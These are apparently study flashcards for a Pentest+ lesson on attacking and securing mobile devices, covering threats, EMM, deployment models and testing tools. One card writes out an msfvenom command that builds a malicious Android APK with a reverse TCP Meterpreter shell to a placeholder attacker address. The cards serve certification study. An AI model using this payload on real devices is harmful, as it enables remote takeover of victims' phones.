Pentest+ Lesson 11 - Targeting Mobile Devices
biometric integration
A system that employs a biometric, such as a fingerprint or facial recognition, when authenticating into a system
Patching Fragmentation
A threat that can occur when device updates are not implemented in a timely manner.
In addition to phishing, pharming, and baiting the victim, malicious actors use other techniques that are specific to mobile devices. List three or four social engineering techniques that are used with mobile devices.
Answers may vary. Vishing is phishing using Voice over Internet Protocol (VoIP). This attack is possible because it is easy to spoof the sender information when using a VoIP call. SMiShing is a form of phishing that uses text messages to entice users to click on a link or provide information. Drive-by downloads can occur while browsing the internet, as a victim can click on a link that will download malicious software; often the victim is unaware of this activity. Spamming is sending unsolicited ads and calls to a mobile user, which can be done either by text or by phone call. Browser hijackers take a web request and send it to another search engine or display persistent advertising, with the goal of stealing information.
When using a Bluetooth-enabled device, best practice techniques will minimize the potential for an attack. List two or three techniques.
Answers may vary. Best practice techniques to secure your Bluetooth connection include: Keep your device non-discoverable. Disable Bluetooth when not using the device. Don't accept unfamiliar requests to pair. Periodically check your list of paired devices.
Enterprise mobility management allows administrators to work from a centralized console and provide remote access to managed devices. List four to five features of an EMM solution.
Answers may vary. Common features of an EMM include: enrolling and authenticating devices; locking and wiping the device; pushing out OS, app, and firmware updates to devices; locating devices through Global Positioning System (GPS) and other technologies; preventing root access or jailbreaking of devices; creating an encrypted container to keep sensitive organization data compartmentalized; and restricting certain features and services based on access control policies.
Many companies adhere to a structured mobile device implementation model which describes the way employees are provided with devices and applications. Describe two or three deployment models.
Answers may vary. Device deployment models can include: Bring your own device (BYOD)—the mobile device is owned by the employee; however, it must be corporate compliant in terms of OS version and functionality. Corporate owned, business only (COBO)—the device is the property of the company and may only be used for company business. Corporate owned, personally enabled (COPE)—the device is supplied and owned by the company. The employee may use it to access personal email, social media, and web browsing; however, they must be compliant with any acceptable use policies in force. Choose your own device (CYOD)—much the same as COPE; however, the employee can select a device from a curated list.
In an environment where there are multiple types of mobile devices, the organization can face numerous threats and vulnerabilities. List three or four issues that can affect the business logic process.
Answers may vary. Issues that can create a vulnerable environment when dealing with mobile devices include: deperimeterization; strained infrastructure; forensics complications; lost or stolen devices; lack of anti-malware protection; using known vulnerable components; dependency vulnerabilities; mobile device storage; and passcode vulnerabilities.
Prior to deployment, it's good practice to test any APIs in your project. One tool that the team can use is Postman. List three or four tasks you can do with Postman.
Answers may vary. Postman has many features so that you can accomplish the following: Explore and create an API. Build and run a test suite. Work with other team members. Analyze results and run reports. Integrate within the DevOps life cycle.
Describe how sandbox analysis can help you understand what happens when a virus executes.
Answers may vary. Sandbox analysis is using virtualization to provide a safe environment to analyze malware. You can create a sandbox using a virtual machine, or use a pre-made sandbox designed to provide a full analysis of malware activity.
Within any organization there are generally some common elements when dealing with mobile devices. List three or four activities that are completed to ensure secure mobile device infrastructure.
Answers may vary. Some of the activities that are completed to ensure secure mobile device infrastructure can include the following: Mobile Device Assessment—provides an overview of compliance and business logic issues. BYOD Approval—selects appropriate devices and creates policies. Secure App Development—creates organization specific apps in-line with organizational policy. Mobile APP Testing—includes Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST).
Some tools work in symphony with one another. Two examples are the tools Frida and Objection. Explain how you would use Frida and Objection when PenTesting.
Answers may vary. When using Objection, the team can run custom Frida scripts and interact with the filesystem on non-jailbroken iOS devices. It uses Frida to inject objects into an application and then monitors the behavior. You can also simulate a jailbroken environment and observe an iOS application within the existing constraints of a sandbox environment or dump the iOS keychain.
Lack of antimalware protection
Not only can malware infect a user's device, but it could likewise spread throughout the network when the device connects. Many mobile devices lack built-in anti-malware software.
remote wipes
Software that allows deletion of data and settings on a mobile device to be initiated from a remote server.
reverse engineering
The process of analyzing the structure of hardware or software to reveal more about how it functions.
sandbox analysis
Using a virtualized environment, this provides a safe environment to analyze malware.
mobile device testing framework
Within the framework, some of the activity can include: Mobile Device Assessment—provides an overview of compliance and business logic issues. BYOD Approval—selects appropriate devices and creates policies. Secure App Development—creates organization-specific apps in line with organizational policy. Mobile App Testing—includes Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST). To achieve these goals, there are several options that include tools and guidelines that are part of a suite. Let's investigate some of the choices available.
EMM (Enterprise Mobility Management)
a class of management software designed to apply security policies to mobile devices and apps in the enterprise
Bluejacking
a method used by attackers to send out unwanted text messages, images, or videos to a mobile phone, tablet, or laptop using a Bluetooth connection. Bluetooth requires relatively close proximity, usually within 30 feet of the target device, to be effective. However, in a busy area such as an airport, this attack is possible.
Bluesnarfing
a more aggressive attack, as a malicious actor is able to read information from a victim's Bluetooth device. The end goal is to glean sensitive data from the victim, like their contacts, calendars, email messages, text messages, etc.
Objection
a runtime exploration toolkit that works on iOS devices. It is a scriptable debugger that allows you to perform various security related tasks on unencrypted iOS applications. With it, the team can run custom Frida scripts and interact with the filesystems on non-jailbroken iOS devices. It uses Frida to inject objects into an application and then monitors the behavior. You can also simulate a jailbroken environment and observe an iOS application within the existing constraints of a sandbox environment or dump the iOS keychain.
API
a set of commands that is used to send and receive data between systems, such as a client and a server
Ettercap
a suite of tools that can be used to launch various types of man-in-the-middle (or on-path) attacks.
APK file
an app designed to run on an Android device. Two Android application decompilers that work with APK files are the APKX tool and APK Studio, and these can be used to monitor the behavior of an APK file. The difference is as follows: APKX tool is an Android APK decompiler that allows you to pull and analyze the Java source code to see what's going on inside. APK Studio is an integrated development environment (IDE) designed so you can decompile and/or edit an APK file.
Burp Suite
an integrated platform for testing web applications along with a mobile assistant designed to test iOS devices.
Trojans
appear as a useful program, such as a game or utility, but contain malware that allows hackers to take control of the victim's computer remotely.
Worms
are a virus sub-class that have the ability to spread without any help from a transport agent such as an email attachment.
Using known vulnerable components
can occur when developers use components that have known vulnerabilities and have not thoroughly tested components and applications prior to publishing.
execution of activities using root
can occur when the user roots or jailbreaks their system to improve the performance of the device. In most cases, this action will leave the system vulnerable to an attack.
Viruses
can self-replicate, yet need a way to propagate to other hosts.
Passcode vulnerabilities
commonly occur as not all systems require frequent password changes. In some cases, the user may fail to implement any password on the device. In addition, although multi-factor authentication can be a more secure option when defending a mobile device, the user may choose not to use this option.
Forensics complications
dealing with BYOD during a forensic exercise may prove difficult or even impossible and compromise the integrity of an investigation
Deperimeterization
employees that take sensitive data outside of the corporate perimeter and do not properly secure their devices will risk data exfiltration
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker IP address> LPORT=<available port> R > malware.apk
This example uses a tool called msfvenom, part of the Metasploit Framework, to create a malicious app package for Android devices. The payload opens a reverse TCP connection back to the attacker's machine, and the output is saved as an app package, or APK file.
Dependency vulnerabilities
exist as some applications on the surface are secure; however, they may have to be dependent on other applications that are vulnerable. This dependency can result in widespread vulnerabilities that can affect the entire system.
Mobile device storage
might be insecure or less protected, allowing a malicious actor to gain access to sensitive data on the device.
over-reach of permissions
often up to the individual to decide what services to access when downloading and installing an app. Instead of using the principle of least privilege, a consumer may feel it is necessary to allow an app to access services and data stores that are generally restricted.
Drozer
open-source software used for testing for vulnerabilities on Android devices. It is an attack framework that allows you to find security flaws in the app and devices. It works as a client-server model and lets you assume the role of an Android app so you can observe the behavior of the app as it interacts with other apps.
Frida
open-source tool that can work with a wide range of operating systems. It includes custom developer tools that help the PenTest team during application PenTesting, as you can examine the plaintext data that is being passed. In addition, it has many other features that allow you to do the following: dump process memory; perform in-process fuzzing; bypass anti-jailbreak (or root) detection; and change a program's behavior.
Rootkits
provide a backdoor for illegal access to a host.
Mobile Security Framework (MobSF)
provides an automated evaluation of code and malware analysis using both static and dynamic analysis as follows: static analysis can evaluate both Android and iOS; dynamic analysis is able to assess an Android platform. The framework conducts a thorough assessment to determine parameters such as OS reputation, whether the device has been rooted or jailbroken, and app security.
Postman
provides an interactive and automatic environment used to interact and test an HTTP API. Along with having an intuitive GUI for constructing API requests, this tool is rich with features so that you can accomplish the following: Explore and create an API. Build and run a test suite. Work with other team members. Analyze results and run reports. Integrate within the DevOps life cycle.
Mobile Security Testing Guide
provides an intuitive framework that steps you through the assessment process. Key elements include: a dashboard to summarize testing information along with contact information; security recommendations for both Android and iOS devices; and specifications for testing resiliency against reverse engineering and tampering. In addition to providing extensive checklists, you'll also find hyperlinks for external resources. All requirements are outlined in an easy-to-read spreadsheet format.
Spyware
records keystrokes and other activity and sends them to a collection site.
business logic process
represents the flow of information from the time the user requests access to the time the request hits a resource. A vulnerability can exist in any of the steps taken to access the resource, and can include the ability to modify cookies, escalate privilege, and circumvent controls.
Strained infrastructure
the addition of multiple devices can place a strain on the network, cause it to stop functioning at optimum capacity, and may lead to an unintentional DoS.
Android SDK tools
tools that have packages so you can design, build, and test mobile apps for Android devices along with reverse engineering an existing device.
Lost or stolen devices
unencrypted data on a phone or tablet is at risk of compromise if that phone or tablet is lost or stolen.